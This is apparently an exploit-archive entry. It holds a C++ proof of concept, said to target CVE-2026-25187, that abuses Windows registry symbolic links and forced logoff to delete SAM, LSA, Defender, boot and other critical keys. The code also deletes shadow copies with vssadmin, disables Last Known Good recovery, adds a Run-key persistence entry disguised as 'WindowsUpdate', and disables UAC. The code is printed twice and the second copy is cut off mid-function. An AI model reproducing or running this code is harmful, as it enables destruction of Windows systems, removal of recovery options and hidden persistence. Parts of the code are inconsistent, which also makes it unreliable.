7.8
/ 10
HIGH
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Description
This code represents a highly destructive proof of concept targeting Windows WinLogon and Registry access control mechanisms to achieve privilege escalation and system integrity compromise. The exploit is built around abusing Registry symbolic links...
Basic Information
ID
PACKETSTORM:219937
Published
Apr 28, 2026 at 00:00
Affected Product
Affected Versions
==================================================================================================================================
| # Title : WinLogon Registry Deletion Exploit Privilege Escalation PoC |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : No standalone download available |
==================================================================================================================================
[+] Summary : This code represents a highly destructive proof-of-concept CVE-2026-25187 targeting Windows WinLogon and Registry access control mechanisms to achieve privilege escalation and system integrity compromise.
The exploit is built around abusing Registry symbolic links and session-based Accessibility paths to redirect sensitive system keys into locations affected during user logoff or session transitions.
[+] POC :
#include <Windows.h>
#include <comdef.h>
#include <stdio.h>
#include <vector>
#include <string>
#include <map>
#include <thread>
#include <chrono>
#include <sddl.h>
#include <winternl.h>
#include <aclapi.h>
#include <lm.h>
#pragma comment(lib, "advapi32.lib")
#pragma comment(lib, "user32.lib")
#pragma comment(lib, "netapi32.lib")
#define INTERNAL_REG_OPTION_CREATE_LINK (0x00000002L)
#define INTERNAL_REG_OPTION_OPEN_LINK (0x00000100L)
extern "C" {
NTSTATUS NTAPI NtCreateKey(
PHANDLE KeyHandle,
ACCESS_MASK DesiredAccess,
POBJECT_ATTRIBUTES ObjectAttributes,
ULONG TitleIndex,
PUNICODE_STRING Class,
ULONG CreateOptions,
PULONG Disposition
);
NTSTATUS NTAPI NtOpenKeyEx(
PHANDLE KeyHandle,
ACCESS_MASK DesiredAccess,
POBJECT_ATTRIBUTES ObjectAttributes,
ULONG OpenOptions
);
NTSTATUS NTAPI NtSetValueKey(
HANDLE KeyHandle,
PUNICODE_STRING ValueName,
ULONG TitleIndex,
ULONG Type,
PVOID Data,
ULONG DataSize
);
NTSTATUS NTAPI NtDeleteKey(HANDLE KeyHandle);
NTSTATUS NTAPI NtOpenKey(
PHANDLE KeyHandle,
ACCESS_MASK DesiredAccess,
POBJECT_ATTRIBUTES ObjectAttributes
);
NTSTATUS NTAPI RtlNtStatusToDosError(NTSTATUS Status);
VOID NTAPI RtlInitUnicodeString(PUNICODE_STRING DestinationString, PCWSTR SourceString);
}
class RegistryUtils {
public:
static std::wstring GetUserSid() {
HANDLE hToken = nullptr;
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken))
return L"";
DWORD dwSize = 0;
GetTokenInformation(hToken, TokenUser, nullptr, 0, &dwSize);
std::vector<BYTE> buffer(dwSize);
if (!GetTokenInformation(hToken, TokenUser, buffer.data(), dwSize, &dwSize)) {
CloseHandle(hToken);
return L"";
}
PTOKEN_USER pTokenUser = reinterpret_cast<PTOKEN_USER>(buffer.data());
LPWSTR lpSid = nullptr;
if (!ConvertSidToStringSid(pTokenUser->User.Sid, &lpSid)) {
CloseHandle(hToken);
return L"";
}
std::wstring sid(lpSid);
LocalFree(lpSid);
CloseHandle(hToken);
return sid;
}
static std::wstring RegPathToNative(const std::wstring& path) {
std::wstring regpath = L"\\Registry\\";
if (path.empty() || path[0] == L'\\')
return path;
if (path.find(L"HKLM\\") == 0) {
return regpath + L"Machine\\" + path.substr(5);
}
else if (path.find(L"HKU\\") == 0) {
return regpath + L"User\\" + path.substr(4);
}
else if (path.find(L"HKCU\\") == 0) {
return regpath + L"User\\" + GetUserSid() + L"\\" + path.substr(5);
}
else if (path.find(L"HKCR\\") == 0) {
return regpath + L"Machine\\Software\\Classes\\" + path.substr(5);
}
return L"";
}
static bool CreateRegistrySymlink(const std::wstring& symlink, const std::wstring& target, bool isVolatile) {
std::wstring nativeSymlink = RegPathToNative(symlink);
std::wstring nativeTarget = RegPathToNative(target);
if (nativeSymlink.empty() || nativeTarget.empty())
return false;
printf("[*] Creating symlink: %ls -> %ls\n", nativeSymlink.c_str(), nativeTarget.c_str());
DeleteRegistrySymlink(symlink);
UNICODE_STRING name;
RtlInitUnicodeString(&name, nativeSymlink.c_str());
OBJECT_ATTRIBUTES objAttr;
InitializeObjectAttributes(&objAttr, &name, OBJ_CASE_INSENSITIVE, nullptr, nullptr);
HANDLE hKey = nullptr;
ULONG disposition = 0;
ULONG options = INTERNAL_REG_OPTION_CREATE_LINK |
(isVolatile ? REG_OPTION_VOLATILE : REG_OPTION_NON_VOLATILE);
NTSTATUS status = NtCreateKey(&hKey, KEY_ALL_ACCESS, &objAttr, 0, nullptr, options, &disposition);
if (status != 0) {
SetLastError(RtlNtStatusToDosError(status));
return false;
}
UNICODE_STRING valueName;
RtlInitUnicodeString(&valueName, L"SymbolicLinkValue");
status = NtSetValueKey(hKey, &valueName, 0, REG_LINK,
(PVOID)nativeTarget.c_str(),
nativeTarget.length() * sizeof(WCHAR));
CloseHandle(hKey);
if (status != 0) {
SetLastError(RtlNtStatusToDosError(status));
return false;
}
printf("[+] Symlink created successfully\n");
return true;
}
static bool DeleteRegistrySymlink(const std::wstring& symlink) {
std::wstring nativeSymlink = RegPathToNative(symlink);
if (nativeSymlink.empty())
return false;
UNICODE_STRING name;
RtlInitUnicodeString(&name, nativeSymlink.c_str());
OBJECT_ATTRIBUTES objAttr;
InitializeObjectAttributes(&objAttr, &name, OBJ_CASE_INSENSITIVE | OBJ_OPENLINK, nullptr, nullptr);
HANDLE hKey = nullptr;
NTSTATUS status = NtOpenKeyEx(&hKey, DELETE, &objAttr, 0);
if (status != 0) {
return true;
}
status = NtDeleteKey(hKey);
CloseHandle(hKey);
return status == 0;
}
static bool DeleteRegistryTreeManual(HKEY rootKey, const std::wstring& subKey) {
HKEY hKey = nullptr;
if (RegOpenKeyExW(rootKey, subKey.c_str(), 0, KEY_READ | KEY_SET_VALUE, &hKey) != ERROR_SUCCESS) {
return false;
}
DWORD index = 0;
WCHAR valueName[256];
DWORD valueNameSize = 256;
while (RegEnumValueW(hKey, index++, valueName, &valueNameSize, nullptr,
nullptr, nullptr, nullptr) == ERROR_SUCCESS) {
RegDeleteValueW(hKey, valueName);
valueNameSize = 256;
index--;
}
index = 0;
WCHAR subKeyName[256];
DWORD subKeyNameSize = 256;
while (RegEnumKeyExW(hKey, index++, subKeyName, &subKeyNameSize, nullptr,
nullptr, nullptr, nullptr) == ERROR_SUCCESS) {
std::wstring fullPath = subKey + L"\\" + subKeyName;
DeleteRegistryTreeManual(rootKey, fullPath);
subKeyNameSize = 256;
index--;
}
RegCloseKey(hKey);
return RegDeleteKeyW(rootKey, subKey.c_str()) == ERROR_SUCCESS;
}
};
class WinLogonEoPExploit {
private:
std::wstring m_sessionPath;
std::vector<std::pair<std::wstring, std::wstring>> m_targets;
bool m_persistentMode;
void InitializeTargets() {
m_targets = {
{L"uac_bypass", L"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System"},
{L" defender", L"HKLM\\SOFTWARE\\Microsoft\\Windows Defender"},
{L"security_policies", L"HKLM\\SECURITY\\Policy"},
{L"lsa_config", L"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa"},
{L"sam_key", L"HKLM\\SAM\\SAM\\Domains\\Account"},
{L"cached_creds", L"HKLM\\SECURITY\\Cache"},
{L"ci_policies", L"HKLM\\SYSTEM\\CurrentControlSet\\Control\\CI\\Policy"},
{L"code_integrity", L"HKLM\\SYSTEM\\CurrentControlSet\\Control\\DeviceGuard"},
{L"uac_settings", L"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\UAC"},
{L"boot_config", L"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Boot"},
{L"winlogon", L"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon"},
{L"critical_services", L"HKLM\\SYSTEM\\CurrentControlSet\\Services"},
};
}
std::wstring BuildSessionPath() {
DWORD sessionId = 0;
ProcessIdToSessionId(GetCurrentProcessId(), &sessionId);
wchar_t path[512];
swprintf_s(path, L"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\Session%d\\ATConfig",
sessionId);
return std::wstring(path);
}
bool PrepareRegistryTarget(const std::wstring& targetPath) {
printf("[*] Preparing target: %ls\n", targetPath.c_str());
std::wstring nativeTarget = RegistryUtils::RegPathToNative(targetPath);
if (nativeTarget.empty()) {
printf("[!] Invalid target path\n");
return false;
}
HKEY hKey = nullptr;
std::wstring cleanPath = targetPath;
if (cleanPath.find(L"HKLM\\") == 0) {
cleanPath = cleanPath.substr(5);
}
if (RegCreateKeyExW(HKEY_LOCAL_MACHINE, cleanPath.c_str(), 0, nullptr,
REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, nullptr,
&hKey, nullptr) == ERROR_SUCCESS) {
DWORD dummy = 0xDEADBEEF;
RegSetValueExW(hKey, L"exploit_marker", 0, REG_DWORD,
(BYTE*)&dummy, sizeof(dummy));
RegCloseKey(hKey);
printf("[+] Target key created/verified\n");
}
return true;
}
bool CreateMaliciousSymlink(const std::wstring& targetPath) {
printf("\n[*] Creating malicious registry symlink...\n");
std::wstring pathWithoutHKLM = m_sessionPath;
if (pathWithoutHKLM.find(L"HKLM\\") == 0) {
pathWithoutHKLM = pathWithoutHKLM.substr(5);
}
RegDeleteTreeW(HKEY_LOCAL_MACHINE, pathWithoutHKLM.c_str());
if (!RegistryUtils::CreateRegistrySymlink(m_sessionPath, targetPath, true)) {
printf("[!] Failed to create symlink: %d\n", GetLastError());
return false;
}
return true;
}
bool TriggerLogout() {
printf("\n[*] Triggering user logout...\n");
BOOL result = FALSE;
result = ExitWindowsEx(EWX_LOGOFF | EWX_FORCE, 0);
if (result) {
printf("[+] Logout initiated via ExitWindowsEx\n");
return true;
}
result = InitiateSystemShutdownExW(nullptr, L"System will logout for maintenance",
5, TRUE, TRUE,
SHTDN_REASON_MAJOR_APPLICATION);
if (result) {
printf("[+] Logout initiated via InitiateSystemShutdownEx\n");
return true;
}
HANDLE hToken = nullptr;
if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) {
TOKEN_PRIVILEGES tp;
LUID luid;
if (LookupPrivilegeValueW(nullptr, SE_SHUTDOWN_NAME, &luid)) {
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken, FALSE, &tp, 0, nullptr, 0);
}
CloseHandle(hToken);
}
result = ExitWindowsEx(EWX_LOGOFF | EWX_FORCE, 0);
return result != FALSE;
}
void DisableRecoveryMechanisms() {
printf("[*] Disabling recovery mechanisms...\n");
HKEY hKey = nullptr;
if (RegOpenKeyExW(HKEY_LOCAL_MACHINE,
L"SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Configuration Manager",
0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) {
DWORD disable = 1;
RegSetValueExW(hKey, L"LastKnownGoodEnabled", 0, REG_DWORD,
(BYTE*)&disable, sizeof(disable));
RegCloseKey(hKey);
}
system("vssadmin delete shadows /all /quiet > nul 2>&1");
}
public:
WinLogonEoPExploit(bool persistentMode = false)
: m_persistentMode(persistentMode) {
InitializeTargets();
}
bool ExploitSingleTarget(const std::wstring& targetName, const std::wstring& targetPath) {
printf("\n=== Attacking target: %ls ===\n", targetName.c_str());
if (!PrepareRegistryTarget(targetPath))
return false;
if (!CreateMaliciousSymlink(targetPath))
return false;
if (!TriggerLogout()) {
printf("[!] Failed to trigger logout\n");
return false;
}
return true;
}
bool ExploitMultipleTargets() {
printf("\n");
printf("========================================\n");
printf(" CVE-2026-25187 - WinLogon EoP Exploit\n");
printf(" Registry Deletion to SYSTEM\n");
printf("========================================\n\n");
m_sessionPath = BuildSessionPath();
printf("[*] Session path: %ls\n", m_sessionPath.c_str());
RegistryUtils::DeleteRegistrySymlink(m_sessionPath);
if (m_persistentMode) {
AddPersistence();
}
DisableRecoveryMechanisms();
printf("\n[*] Available targets:\n");
for (size_t i = 0; i < m_targets.size(); i++) {
printf(" [%zu] %ls - %ls\n", i, m_targets[i].first.c_str(), m_targets[i].second.c_str());
}
printf("\n[*] Targeting all critical keys for maximum impact...\n");
for (const auto& target : m_targets) {
RegistryUtils::DeleteRegistrySymlink(m_sessionPath);
if (CreateMaliciousSymlink(target.second)) {
printf("[+] Symlink created for %ls\n", target.first.c_str());
Sleep(100);
}
}
printf("\n[*] Triggering final logout for mass deletion...\n");
TriggerLogout();
return true;
}
void AddPersistence() {
HKEY hKey = nullptr;
if (RegOpenKeyExW(HKEY_CURRENT_USER,
L"Software\\Microsoft\\Windows\\CurrentVersion\\Run",
0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) {
wchar_t path[MAX_PATH];
GetModuleFileNameW(nullptr, path, MAX_PATH);
RegSetValueExW(hKey, L"WindowsUpdate", 0, REG_SZ,
(BYTE*)path, (wcslen(path) + 1) * sizeof(wchar_t));
RegCloseKey(hKey);
printf("[+] Persistence added to HKCU\\Run\n");
}
}
bool CreateMassiveRegistryCorruption() {
printf("\n[*] Creating massive registry corruption...\n");
std::vector<std::wstring> extraTargets = {
L"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Executive",
L"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Memory Management",
L"HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\SCHANNEL",
L"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\System",
L"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",
};
for (const auto& target : extraTargets) {
RegistryUtils::DeleteRegistrySymlink(m_sessionPath);
if (RegistryUtils::CreateRegistrySymlink(m_sessionPath, target, true)) {
printf("[+] Corruption symlink created for: %ls\n", target.c_str());
Sleep(50);
}
}
return true;
}
};
class PrivilegeEscalation {
public:
static bool DisableUAC() {
printf("[*] Disabling UAC...\n");
HKEY hKey = nullptr;
if (RegOpenKeyExW(HKEY_LOCAL_MACHINE,
L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) {
DWORD disable = 0;
RegSetValueExW(hKey, L"EnableLUA", 0, REG_DWORD, (BYTE*)&disable, sizeof(disable));
RegSetValueExW(hKey, L"ConsentPromptBehaviorAdmin", 0, REG_DWORD, (BYTE*)&disable, sizeof(disable));
RegCloseKey(hKey);
printf("[+] UAC disabled (requires reboot)\n");
return true;
}
return false;
}
static bool GrantDebugPrivileges() {
printf("[*] Granting debug privileges...\n");
HKEY hKey = nullptr;
if (RegOpenKeyExW(HKEY_LOCAL_MACHINE,
L"SECURITY\\Policy\\Privileges",
0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) {
RegCloseKey(hKey);
return true;
}
return false;
}
};
int wmain(int argc, wchar_t* argv[]) {
printf("\n");
printf("========================================\n");
printf(" CVE-2026-25187 - Critical EoP Exploit\n");
printf(" WinLogon Registry Deletion to SYSTEM\n");
printf("========================================\n\n");
bool massDeletion = false;
bool persistent = false;
int targetIndex = -1;
for (int i = 1; i < argc; i++) {
if (_wcsicmp(argv[i], L"--mass") == 0) {
massDeletion = true;
}
else if (_wcsicmp(argv[i], L"--persist") == 0) {
persistent = true;
}
else if (_wcsicmp(argv[i], L"--target") == 0 && i + 1 < argc) {
targetIndex = _wtoi(argv[++i]);
}
else if (_wcsicmp(argv[i], L"--help") == 0) {
printf("Usage: %s [options]\n", argv[0]);
printf("Options:\n");
printf(" --mass Mass delete multiple critical keys\n");
printf(" --persist Add persistence to startup\n");
printf(" --target N Attack specific target by index\n");
printf(" --disable-uac Disable UAC after deletion\n");
printf("\nWARNING: This exploit will cause system instability!\n");
return 0;
}
}
printf("[!] WARNING: This exploit will delete critical registry keys!\n");
printf("[!] System may become UNBOOTABLE or severely damaged.\n");
printf("[!] Continue? (y/N): ");
wint_t ch = towlower(getwchar());
if (ch != L'y') {
printf("[*] Exploit aborted.\n");
return 0;
}
WinLogonEoPExploit exploit(persistent);
bool success = false;
if (massDeletion) {
printf("\n[*] Running mass deletion mode...\n");
success = exploit.ExploitMultipleTargets();
exploit.CreateMassiveRegistryCorruption();
} else {
printf("\n[*] Available targets:\n");
printf(" 0 - UAC Bypass (Disable UAC)\n");
printf(" 1 - Windows Defender\n");
printf(" 2 - Security Policies\n");
printf(" 3 - LSA Configuration\n");
printf(" 4 - SAM (Password Hashes)\n");
printf(" 5 - Cached Credentials\n");
printf(" 6 - Code Integrity\n");
printf(" 7 - Boot Configuration (DoS)\n");
printf(" 8 - ALL (Mass Deletion)\n");
int choice = targetIndex;
if (choice == -1) {
printf("\n[*] Select target (0-8): ");
wscanf_s(L"%d", &choice);
}
if (choice == 8) {
success = exploit.ExploitMultipleTargets();
} else if (choice >= 0 && choice < 8) {
auto& target = exploit.m_targets[choice];
success = exploit.ExploitSingleTarget(target.first, target.second);
if (choice == 0) {
PrivilegeEscalation::DisableUAC();
}
}
}
if (success) {
printf("\n[+] Exploit triggered! System will logout now.\n");
printf("[*] After login, check if target registry keys are deleted.\n");
Sleep(2000);
} else {
printf("\n[!] Exploit failed. Try running again or use different target.\n");
}
return 0;
}
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================
| # Title : WinLogon Registry Deletion Exploit Privilege Escalation PoC |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : No standalone download available |
==================================================================================================================================
[+] Summary : This code represents a highly destructive proof-of-concept CVE-2026-25187 targeting Windows WinLogon and Registry access control mechanisms to achieve privilege escalation and system integrity compromise.
The exploit is built around abusing Registry symbolic links and session-based Accessibility paths to redirect sensitive system keys into locations affected during user logoff or session transitions.
[+] POC :
#include <Windows.h>
#include <comdef.h>
#include <stdio.h>
#include <vector>
#include <string>
#include <map>
#include <thread>
#include <chrono>
#include <sddl.h>
#include <winternl.h>
#include <aclapi.h>
#include <lm.h>
#pragma comment(lib, "advapi32.lib")
#pragma comment(lib, "user32.lib")
#pragma comment(lib, "netapi32.lib")
#define INTERNAL_REG_OPTION_CREATE_LINK (0x00000002L)
#define INTERNAL_REG_OPTION_OPEN_LINK (0x00000100L)
extern "C" {
NTSTATUS NTAPI NtCreateKey(
PHANDLE KeyHandle,
ACCESS_MASK DesiredAccess,
POBJECT_ATTRIBUTES ObjectAttributes,
ULONG TitleIndex,
PUNICODE_STRING Class,
ULONG CreateOptions,
PULONG Disposition
);
NTSTATUS NTAPI NtOpenKeyEx(
PHANDLE KeyHandle,
ACCESS_MASK DesiredAccess,
POBJECT_ATTRIBUTES ObjectAttributes,
ULONG OpenOptions
);
NTSTATUS NTAPI NtSetValueKey(
HANDLE KeyHandle,
PUNICODE_STRING ValueName,
ULONG TitleIndex,
ULONG Type,
PVOID Data,
ULONG DataSize
);
NTSTATUS NTAPI NtDeleteKey(HANDLE KeyHandle);
NTSTATUS NTAPI NtOpenKey(
PHANDLE KeyHandle,
ACCESS_MASK DesiredAccess,
POBJECT_ATTRIBUTES ObjectAttributes
);
NTSTATUS NTAPI RtlNtStatusToDosError(NTSTATUS Status);
VOID NTAPI RtlInitUnicodeString(PUNICODE_STRING DestinationString, PCWSTR SourceString);
}
class RegistryUtils {
public:
static std::wstring GetUserSid() {
HANDLE hToken = nullptr;
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken))
return L"";
DWORD dwSize = 0;
GetTokenInformation(hToken, TokenUser, nullptr, 0, &dwSize);
std::vector<BYTE> buffer(dwSize);
if (!GetTokenInformation(hToken, TokenUser, buffer.data(), dwSize, &dwSize)) {
CloseHandle(hToken);
return L"";
}
PTOKEN_USER pTokenUser = reinterpret_cast<PTOKEN_USER>(buffer.data());
LPWSTR lpSid = nullptr;
if (!ConvertSidToStringSid(pTokenUser->User.Sid, &lpSid)) {
CloseHandle(hToken);
return L"";
}
std::wstring sid(lpSid);
LocalFree(lpSid);
CloseHandle(hToken);
return sid;
}
static std::wstring RegPathToNative(const std::wstring& path) {
std::wstring regpath = L"\\Registry\\";
if (path.empty() || path[0] == L'\\')
return path;
if (path.find(L"HKLM\\") == 0) {
return regpath + L"Machine\\" + path.substr(5);
}
else if (path.find(L"HKU\\") == 0) {
return regpath + L"User\\" + path.substr(4);
}
else if (path.find(L"HKCU\\") == 0) {
return regpath + L"User\\" + GetUserSid() + L"\\" + path.substr(5);
}
else if (path.find(L"HKCR\\") == 0) {
return regpath + L"Machine\\Software\\Classes\\" + path.substr(5);
}
return L"";
}
static bool CreateRegistrySymlink(const std::wstring& symlink, const std::wstring& target, bool isVolatile) {
std::wstring nativeSymlink = RegPathToNative(symlink);
std::wstring nativeTarget = RegPathToNative(target);
if (nativeSymlink.empty() || nativeTarget.empty())
return false;
printf("[*] Creating symlink: %ls -> %ls\n", nativeSymlink.c_str(), nativeTarget.c_str());
DeleteRegistrySymlink(symlink);
UNICODE_STRING name;
RtlInitUnicodeString(&name, nativeSymlink.c_str());
OBJECT_ATTRIBUTES objAttr;
InitializeObjectAttributes(&objAttr, &name, OBJ_CASE_INSENSITIVE, nullptr, nullptr);
HANDLE hKey = nullptr;
ULONG disposition = 0;
ULONG options = INTERNAL_REG_OPTION_CREATE_LINK |
(isVolatile ? REG_OPTION_VOLATILE : REG_OPTION_NON_VOLATILE);
NTSTATUS status = NtCreateKey(&hKey, KEY_ALL_ACCESS, &objAttr, 0, nullptr, options, &disposition);
if (status != 0) {
SetLastError(RtlNtStatusToDosError(status));
return false;
}
UNICODE_STRING valueName;
RtlInitUnicodeString(&valueName, L"SymbolicLinkValue");
status = NtSetValueKey(hKey, &valueName, 0, REG_LINK,
(PVOID)nativeTarget.c_str(),
nativeTarget.length() * sizeof(WCHAR));
CloseHandle(hKey);
if (status != 0) {
SetLastError(RtlNtStatusToDosError(status));
return false;
}
printf("[+] Symlink created successfully\n");
return true;
}
static bool DeleteRegistrySymlink(const std::wstring& symlink) {
std::wstring nativeSymlink = RegPathToNative(symlink);
if (nativeSymlink.empty())
return false;
UNICODE_STRING name;
RtlInitUnicodeString(&name, nativeSymlink.c_str());
OBJECT_ATTRIBUTES objAttr;
InitializeObjectAttributes(&objAttr, &name, OBJ_CASE_INSENSITIVE | OBJ_OPENLINK, nullptr, nullptr);
HANDLE hKey = nullptr;
NTSTATUS status = NtOpenKeyEx(&hKey, DELETE, &objAttr, 0);
if (status != 0) {
return true;
}
status = NtDeleteKey(hKey);
CloseHandle(hKey);
return status == 0;
}
static bool DeleteRegistryTreeManual(HKEY rootKey, const std::wstring& subKey) {
HKEY hKey = nullptr;
if (RegOpenKeyExW(rootKey, subKey.c_str(), 0, KEY_READ | KEY_SET_VALUE, &hKey) != ERROR_SUCCESS) {
return false;
}
DWORD index = 0;
WCHAR valueName[256];
DWORD valueNameSize = 256;
while (RegEnumValueW(hKey, index++, valueName, &valueNameSize, nullptr,
nullptr, nullptr, nullptr) == ERROR_SUCCESS) {
RegDeleteValueW(hKey, valueName);
valueNameSize = 256;
index--;
}
index = 0;
WCHAR subKeyName[256];
DWORD subKeyNameSize = 256;
while (RegEnumKeyExW(hKey, index++, subKeyName, &subKeyNameSize, nullptr,
nullptr, nullptr, nullptr) == ERROR_SUCCESS) {
std::wstring fullPath = subKey + L"\\" + subKeyName;
DeleteRegistryTreeManual(rootKey, fullPath);
subKeyNameSize = 256;
index--;
}
RegCloseKey(hKey);
return RegDeleteKeyW(rootKey, subKey.c_str()) == ERROR_SUCCESS;
}
};
class WinLogonEoPExploit {
private:
std::wstring m_sessionPath;
std::vector<std::pair<std::wstring, std::wstring>> m_targets;
bool m_persistentMode;
void InitializeTargets() {
m_targets = {
{L"uac_bypass", L"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System"},
{L" defender", L"HKLM\\SOFTWARE\\Microsoft\\Windows Defender"},
{L"security_policies", L"HKLM\\SECURITY\\Policy"},
{L"lsa_config", L"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa"},
{L"sam_key", L"HKLM\\SAM\\SAM\\Domains\\Account"},
{L"cached_creds", L"HKLM\\SECURITY\\Cache"},
{L"ci_policies", L"HKLM\\SYSTEM\\CurrentControlSet\\Control\\CI\\Policy"},
{L"code_integrity", L"HKLM\\SYSTEM\\CurrentControlSet\\Control\\DeviceGuard"},
{L"uac_settings", L"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\UAC"},
{L"boot_config", L"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Boot"},
{L"winlogon", L"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon"},
{L"critical_services", L"HKLM\\SYSTEM\\CurrentControlSet\\Services"},
};
}
std::wstring BuildSessionPath() {
DWORD sessionId = 0;
ProcessIdToSessionId(GetCurrentProcessId(), &sessionId);
wchar_t path[512];
swprintf_s(path, L"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\Session%d\\ATConfig",
sessionId);
return std::wstring(path);
}
bool PrepareRegistryTarget(const std::wstring& targetPath) {
printf("[*] Preparing target: %ls\n", targetPath.c_str());
std::wstring nativeTarget = RegistryUtils::RegPathToNative(targetPath);
if (nativeTarget.empty()) {
printf("[!] Invalid target path\n");
return false;
}
HKEY hKey = nullptr;
std::wstring cleanPath = targetPath;
if (cleanPath.find(L"HKLM\\") == 0) {
cleanPath = cleanPath.substr(5);
}
if (RegCreateKeyExW(HKEY_LOCAL_MACHINE, cleanPath.c_str(), 0, nullptr,
REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, nullptr,
&hKey, nullptr) == ERROR_SUCCESS) {
DWORD dummy = 0xDEADBEEF;
RegSetValueExW(hKey, L"exploit_marker", 0, REG_DWORD,
(BYTE*)&dummy, sizeof(dummy));
RegCloseKey(hKey);
printf("[+] Target key created/verified\n");
}
return true;
}
bool CreateMaliciousSymlink(const std::wstring& targetPath) {
printf("\n[*] Creating malicious registry symlink...\n");
std::wstring pathWithoutHKLM = m_sessionPath;
if (pathWithoutHKLM.find(L"HKLM\\") == 0) {
pathWithoutHKLM = pathWithoutHKLM.substr(5);
}
RegDeleteTreeW(HKEY_LOCAL_MACHINE, pathWithoutHKLM.c_str());
if (!RegistryUtils::CreateRegistrySymlink(m_sessionPath, targetPath, true)) {
printf("[!] Failed to create symlink: %d\n", GetLastError());
return false;
}
return true;
}
bool TriggerLogout() {
printf("\n[*] Triggering user logout...\n");
BOOL result = FALSE;
result = ExitWindowsEx(EWX_LOGOFF | EWX_FORCE, 0);
if (result) {
printf("[+] Logout initiated via ExitWindowsEx\n");
return true;
}
result = InitiateSystemShutdownExW(nullptr, L"System will logout for maintenance",
5, TRUE, TRUE,
SHTDN_REASON_MAJOR_APPLICATION);
if (result) {
printf("[+] Logout initiated via InitiateSystemShutdownEx\n");
return true;
}
HANDLE hToken = nullptr;
if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) {
TOKEN_PRIVILEGES tp;
LUID luid;
if (LookupPrivilegeValueW(nullptr, SE_SHUTDOWN_NAME, &luid)) {
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken, FALSE, &tp, 0, nullptr, 0);
}
CloseHandle(hToken);
}
result = ExitWindowsEx(EWX_LOGOFF | EWX_FORCE, 0);
return result != FALSE;
}
void DisableRecoveryMechanisms() {
printf("[*] Disabling recovery mechanisms...\n");
HKEY hKey = nullptr;
if (RegOpenKeyExW(HKEY_LOCAL_MACHINE,
L"SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Configuration Manager",
0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) {
DWORD disable = 1;
RegSetValueExW(hKey, L"LastKnownGoodEnabled", 0, REG_DWORD,
(BYTE*)&disable, sizeof(disable));
RegCloseKey(hKey);
}
system("vssadmin delete shadows /all /quiet > nul 2>&1");
}
public:
WinLogonEoPExploit(bool persistentMode = false)
: m_persistentMode(persistentMode) {
InitializeTargets();
}
bool ExploitSingleTarget(const std::wstring& targetName, const std::wstring& targetPath) {
printf("\n=== Attacking target: %ls ===\n", targetName.c_str());
if (!PrepareRegistryTarget(targetPath))
return false;
if (!CreateMaliciousSymlink(targetPath))
return false;
if (!TriggerLogout()) {
printf("[!] Failed to trigger logout\n");
return false;
}
return true;
}
bool ExploitMultipleTargets() {
printf("\n");
printf("========================================\n");
printf(" CVE-2026-25187 - WinLogon EoP Exploit\n");
printf(" Registry Deletion to SYSTEM\n");
printf("========================================\n\n");
m_sessionPath = BuildSessionPath();
printf("[*] Session path: %ls\n", m_sessionPath.c_str());
RegistryUtils::DeleteRegistrySymlink(m_sessionPath);
if (m_persistentMode) {
AddPersistence();
}
DisableRecoveryMechanisms();
printf("\n[*] Available targets:\n");
for (size_t i = 0; i < m_targets.size(); i++) {
printf(" [%zu] %ls - %ls\n", i, m_targets[i].first.c_str(), m_targets[i].second.c_str());
}
printf("\n[*] Targeting all critical keys for maximum impact...\n");
for (const auto& target : m_targets) {
RegistryUtils::DeleteRegistrySymlink(m_sessionPath);
if (CreateMaliciousSymlink(target.second)) {
printf("[+] Symlink created for %ls\n", target.first.c_str());
Sleep(100);
}
}
printf("\n[*] Triggering final logout for mass deletion...\n");
TriggerLogout();
return true;
}
void AddPersistence() {
HKEY hKey = nullptr;
